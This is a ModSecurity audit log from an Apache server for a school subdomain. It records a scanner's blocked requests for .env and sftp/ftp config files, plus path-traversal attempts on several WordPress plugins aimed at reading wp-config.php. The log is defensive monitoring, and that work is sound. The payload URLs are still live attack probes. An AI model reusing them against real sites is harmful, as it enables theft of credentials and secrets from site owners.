AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --4cd5b410-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4cd5b410-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384851758035 702 (- - -) Stopwatch2: 1747384851758035 702; combined=290, p1=258, p2=0, p3=0, p4=0, p5=32, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4cd5b410-Z-- --83d0615f-A-- [16/May/2025:15:40:51 +0700] aCb6E0E0LfP59mkCzg73bQAAAMo 103.236.140.4 47600 103.236.140.4 8181 --83d0615f-B-- GET /laravel/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --83d0615f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83d0615f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384851952060 672 (- - -) Stopwatch2: 1747384851952060 672; combined=272, p1=239, p2=0, p3=0, p4=0, p5=32, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83d0615f-Z-- --f3a2dc15-A-- [16/May/2025:15:40:52 +0700] aCb6FEE0LfP59mkCzg73bgAAAMg 103.236.140.4 47602 103.236.140.4 8181 --f3a2dc15-B-- GET /ci4/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --f3a2dc15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3a2dc15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384852145550 658 (- - -) Stopwatch2: 1747384852145550 658; combined=250, p1=219, p2=0, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3a2dc15-Z-- --a1f0e436-A-- [16/May/2025:15:40:52 +0700] aCb6FEE0LfP59mkCzg73bwAAAMs 103.236.140.4 47604 103.236.140.4 8181 --a1f0e436-B-- GET /backup/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --a1f0e436-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1f0e436-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384852339134 681 (- - -) Stopwatch2: 1747384852339134 681; combined=273, p1=242, p2=0, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1f0e436-Z-- --16344e2a-A-- [16/May/2025:15:40:52 +0700] aCb6FNhEtho3ciA0weghcQAAAIc 103.236.140.4 47606 103.236.140.4 8181 --16344e2a-B-- GET /frontend/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --16344e2a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16344e2a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384852532444 673 (- - -) Stopwatch2: 1747384852532444 673; combined=254, p1=221, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16344e2a-Z-- --38ae0b36-A-- [16/May/2025:15:40:52 +0700] aCb6FNhEtho3ciA0weghcgAAAIo 103.236.140.4 47608 103.236.140.4 8181 --38ae0b36-B-- GET /old/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --38ae0b36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --38ae0b36-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384852725528 657 (- - -) Stopwatch2: 1747384852725528 657; combined=252, p1=219, p2=0, p3=0, p4=0, p5=32, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38ae0b36-Z-- --4305744d-A-- [16/May/2025:15:40:52 +0700] aCb6FNe6THFz1hsaJaKRigAAAA0 103.236.140.4 47610 103.236.140.4 8181 --4305744d-B-- GET /dev/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --4305744d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4305744d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384852919700 668 (- - -) Stopwatch2: 1747384852919700 668; combined=249, p1=218, p2=0, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4305744d-Z-- --58232132-A-- [16/May/2025:15:40:53 +0700] aCb6FdhEtho3ciA0weghcwAAAJA 103.236.140.4 47612 103.236.140.4 8181 --58232132-B-- GET /.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --58232132-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58232132-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384853113302 681 (- - -) Stopwatch2: 1747384853113302 681; combined=252, p1=221, p2=0, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58232132-Z-- --1c854e54-A-- [16/May/2025:15:40:53 +0700] aCb6FUE0LfP59mkCzg73cAAAAMw 103.236.140.4 47614 103.236.140.4 8181 --1c854e54-B-- GET /public/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --1c854e54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c854e54-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384853306699 732 (- - -) Stopwatch2: 1747384853306699 732; combined=316, p1=282, p2=0, p3=0, p4=0, p5=33, sr=122, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c854e54-Z-- --2c74a30b-A-- [16/May/2025:15:40:58 +0700] aCb6GthEtho3ciA0weghigAAAJY 103.236.140.4 47674 103.236.140.4 8181 --2c74a30b-B-- GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --2c74a30b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c74a30b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384858799602 694 (- - -) Stopwatch2: 1747384858799602 694; combined=256, p1=224, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c74a30b-Z-- --df650c10-A-- [16/May/2025:15:40:58 +0700] aCb6GthEtho3ciA0weghiwAAAJc 103.236.140.4 47676 103.236.140.4 8181 --df650c10-B-- GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --df650c10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df650c10-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384858993811 690 (- - -) Stopwatch2: 1747384858993811 690; combined=249, p1=224, p2=0, p3=0, p4=0, p5=25, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df650c10-Z-- --3f7df10a-A-- [16/May/2025:15:40:59 +0700] aCb6G9hEtho3ciA0weghjAAAAJg 103.236.140.4 47678 103.236.140.4 8181 --3f7df10a-B-- GET /force-download.php?file=wp-config.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --3f7df10a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f7df10a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384859187635 759 (- - -) Stopwatch2: 1747384859187635 759; combined=294, p1=257, p2=0, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f7df10a-Z-- --81e53329-A-- [16/May/2025:15:40:59 +0700] aCb6G9hEtho3ciA0weghjQAAAIA 103.236.140.4 47680 103.236.140.4 8181 --81e53329-B-- GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --81e53329-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81e53329-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384859381465 683 (- - -) Stopwatch2: 1747384859381465 683; combined=262, p1=230, p2=0, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81e53329-Z-- --6cb0dd67-A-- [16/May/2025:15:40:59 +0700] aCb6G9hEtho3ciA0weghjwAAAIQ 103.236.140.4 47686 103.236.140.4 8181 --6cb0dd67-B-- GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --6cb0dd67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6cb0dd67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384859576033 822 (- - -) Stopwatch2: 1747384859576033 822; combined=314, p1=280, p2=0, p3=0, p4=0, p5=34, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6cb0dd67-Z-- --a7990a49-A-- [16/May/2025:15:41:01 +0700] aCb6HdhEtho3ciA0weghmQAAAJI 103.236.140.4 47706 103.236.140.4 8181 --a7990a49-B-- GET /.vscode/sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --a7990a49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7990a49-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384861538854 694 (- - -) Stopwatch2: 1747384861538854 694; combined=243, p1=214, p2=0, p3=0, p4=0, p5=29, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7990a49-Z-- --bd52a12b-A-- [16/May/2025:15:41:01 +0700] aCb6HdhEtho3ciA0weghmgAAAJU 103.236.140.4 47708 103.236.140.4 8181 --bd52a12b-B-- GET /resources/sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --bd52a12b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd52a12b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384861732511 790 (- - -) Stopwatch2: 1747384861732511 790; combined=304, p1=266, p2=0, p3=0, p4=0, p5=38, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd52a12b-Z-- --bc4ee848-A-- [16/May/2025:15:41:02 +0700] aCb6HthEtho3ciA0weghnAAAAJY 103.236.140.4 47712 103.236.140.4 8181 --bc4ee848-B-- GET /ftp.config HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --bc4ee848-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc4ee848-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747384862125708 2276 (- - -) Stopwatch2: 1747384862125708 2276; combined=794, p1=370, p2=397, p3=0, p4=0, p5=26, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc4ee848-Z-- --4d9cf44d-A-- [16/May/2025:15:41:04 +0700] aCb6INhEtho3ciA0weghpwAAAJM 103.236.140.4 47736 103.236.140.4 8181 --4d9cf44d-B-- GET /ftp.config HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 